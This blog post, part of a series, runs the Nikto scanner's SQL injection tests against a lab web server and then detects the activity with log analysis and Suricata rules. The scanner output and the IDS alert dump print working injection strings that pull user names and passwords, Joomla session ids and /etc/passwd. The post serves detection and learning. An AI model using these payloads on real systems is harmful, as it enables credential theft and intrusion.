This post is part of the series of learning more about Nikto and web application scanning from the perspectives of both the hack and its detection.
From the hacking perspective, Nikto is the tool used. From detection perspective, the tools and or processed used for the network forensics are log analysis, TShark, Zeek and Suricata.
The Hack - SQL Injection with default evasion.
┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_9] └─$ nikto -host http://10.0.0.106 -ipv4 -Display 1 --ask no -nossl -no404 -Tuning 9 - Nikto v2.5.0 --------------------------------------------------------------------------- + Target IP: 10.0.0.106 + Target Hostname: 10.0.0.106 + Target Port: 80 + Start Time: 2023-06-09 14:09:20 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28 + /cgi.cgi/: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options + /cgi.cgi/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/ + /: Retrieved x-powered-by header: PHP/8.0.28. + PHP/8.0.28 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch. + OpenSSL/1.1.1t appears to be outdated (current is at least 3.0.7). OpenSSL 1.1.1s is current for the 1.x branch and will be supported until Nov 11 2023. + /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing + /index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/* - Redirects (302) to http://10.0.0.106/dashboard/ , My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection. .... /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select%201%20FROM(select%20count(*),concat((select%20(select%20concat(session_id))%20FROM%20jml_session%20LIMIT%200,1),floor(rand(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a) - Redirects (302) to http://10.0.0.106/dashboard/ , Joomla is vulnerable to a SQL injection which can lead to administrator access. https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/?page=1&year=0&month=0 + 783 requests: 0 error(s) and 6 item(s) reported on remote host + End Time: 2023-06-09 14:09:22 (GMT-4) (2 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
Once again, index.php does not have most of the parameters that Nikto is reporting as vulnerable. What do I make of the output from the tool. I make that it is time for me to move on.
See here for more guidance on SQL Injection: or
Learning by practicing: Beginning Web Application Testing: SQL Injection - Mutillidae (securitynik.com)Learning by practicing: Continuing SQL Injection with SQLMap - Exploitation (securitynik.com)
Detect - Log Analysis
Quick log analysis says most of this activity is a waste of time. First most of the parameters targeted here does not exist on index.php page. We know this from the previous posts in this series. Second their is no request.php file.
I've lost interest. Maybe need to do the test from another perspective.
See this link for for assistance with detecting SQL injection in your infrastructure.
See this link for for assistance with detecting SQL injection in your infrastructure.
Detect - Suricata (IDS) Analysis
Setup Suricata to operate in IDS mode
┌──(kali㉿securitynik)-[/var/log/suricata] └─$ sudo suricata -c /etc/suricata/suricata.yaml -s /var/lib/suricata/rules/suricata.rules -i eth0 -l /var/log/suricata/ --simulate-ips -k all
What does the IDS see
┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_9] └─$ cat fast.log | cut --fields=3 --delimiter='[' | sort | uniq --count | sort --numeric-sort --reverse | head --lines=5 35 1:2022028:2] ET WEB_SERVER Possible CVE-2014-6271 Attempt 14 1:2021390:3] ET WEB_SPECIFIC_APPS WEB-PHP RCE PHPBB 2004-1315 6 1:2006445:14] ET WEB_SERVER Possible SQL Injection Attempt SELECT FROM 5 1:2006446:14] ET WEB_SERVER Possible SQL Injection Attempt UNION SELECT 4 1:2011042:6] ET WEB_SERVER MYSQL SELECT CONCAT SQL Injection Attempt
See 3 unique alerts for SQL injection attempt. Find the associated rules:
┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_9] └─$ grep --perl-regexp "2006445|2006446|2011042" /var/lib/suricata/rules/suricata.rules alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Possible SQL Injection Attempt SELECT FROM"; flow:established,to_server; http.uri; content:"SELECT"; nocase; content:"FROM"; nocase; distance:0; reference:url,en.wikipedia.org/wiki/SQL_injection; reference:url,doc.emergingthreats.net/2006445; classtype:web-application-attack; sid:2006445; rev:14; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, signature_severity Major, tag SQL_Injection, updated_at 2020_05_01;) alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Possible SQL Injection Attempt UNION SELECT"; flow:established,to_server; http.uri; content:"UNION"; nocase; content:"SELECT"; nocase; distance:0; reference:url,en.wikipedia.org/wiki/SQL_injection; reference:url,doc.emergingthreats.net/2006446; classtype:web-application-attack; sid:2006446; rev:14; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, signature_severity Major, tag SQL_Injection, updated_at 2020_09_01;) alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER MYSQL SELECT CONCAT SQL Injection Attempt"; flow:established,to_server; http.uri; content:"SELECT"; nocase; content:"CONCAT"; nocase; pcre:"/SELECT.+CONCAT/i"; reference:url,ferruh.mavituna.com/sql-injection-cheatsheet-oku/; reference:url,www.webdevelopersnotes.com/tutorials/sql/a_little_more_on_the_mysql_select_statement.php3; reference:url,doc.emergingthreats.net/2011042; classtype:web-application-attack; sid:2011042; rev:6; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, signature_severity Major, tag SQL_Injection, updated_at 2020_09_14;)
Find an alert for "2006445"
┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_9] └─$ less alert-debug.log ALERT CNT: 2 ALERT MSG [00]: ET WEB_SERVER Possible SQL Injection Attempt SELECT FROM ALERT GID [00]: 1 ALERT SID [00]: 2006445 ALERT REV [00]: 14 ALERT CLASS [00]: Web Application Attack ALERT PRIO [00]: 1 ALERT FOUND IN [00]: STATE ALERT IN TX [00]: 34 PAYLOAD LEN: 316 PAYLOAD: 0000 47 45 54 20 2F 73 69 74 65 2F 27 25 32 30 55 4E GET /sit e/'%20UN 0010 49 4F 4E 25 32 30 41 4C 4C 25 32 30 53 45 4C 45 ION%20AL L%20SELE 0020 43 54 25 32 30 46 69 6C 65 54 6F 43 6C 6F 62 28 CT%20Fil eToClob( 0030 27 2F 65 74 63 2F 70 61 73 73 77 64 27 2C 27 73 '/etc/pa sswd','s 0040 65 72 76 65 72 27 29 3A 3A 68 74 6D 6C 2C 30 25 erver'): :html,0% 0050 32 30 46 52 4F 4D 25 32 30 73 79 73 75 73 65 72 20FROM%2 0sysuser 0060 73 25 32 30 57 48 45 52 45 25 32 30 75 73 65 72 s%20WHER E%20user 0070 6E 61 6D 65 3D 55 53 45 52 25 32 30 2D 2D 2F 2E name=USE R%20--/. 0080 68 74 6D 6C 20 48 54 54 50 2F 31 2E 31 0D 0A 55 html HTT P/1.1..U 0090 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C ser-Agen t: Mozil 00A0 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F 77 73 20 la/5.0 ( Windows 00B0 4E 54 20 31 30 2E 30 3B 20 57 69 6E 36 34 3B 20 NT 10.0; Win64; 00C0 78 36 34 29 20 41 70 70 6C 65 57 65 62 4B 69 74 x64) App leWebKit 00D0 2F 35 33 37 2E 33 36 20 28 4B 48 54 4D 4C 2C 20 /537.36 (KHTML, 00E0 6C 69 6B 65 20 47 65 63 6B 6F 29 20 43 68 72 6F like Gec ko) Chro 00F0 6D 65 2F 37 34 2E 30 2E 33 37 32 39 2E 31 36 39 me/74.0. 3729.169 0100 20 53 61 66 61 72 69 2F 35 33 37 2E 33 36 0D 0A Safari/ 537.36.. 0110 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 4B 65 65 70 Connecti on: Keep 0120 2D 41 6C 69 76 65 0D 0A 48 6F 73 74 3A 20 31 30 -Alive.. Host: 10 0130 2E 30 2E 30 2E 31 30 36 0D 0A 0D 0A .0.0.106 ....
That's it. Moving on.
Hope you enjoyed the posts in this series:
No comments:
Post a Comment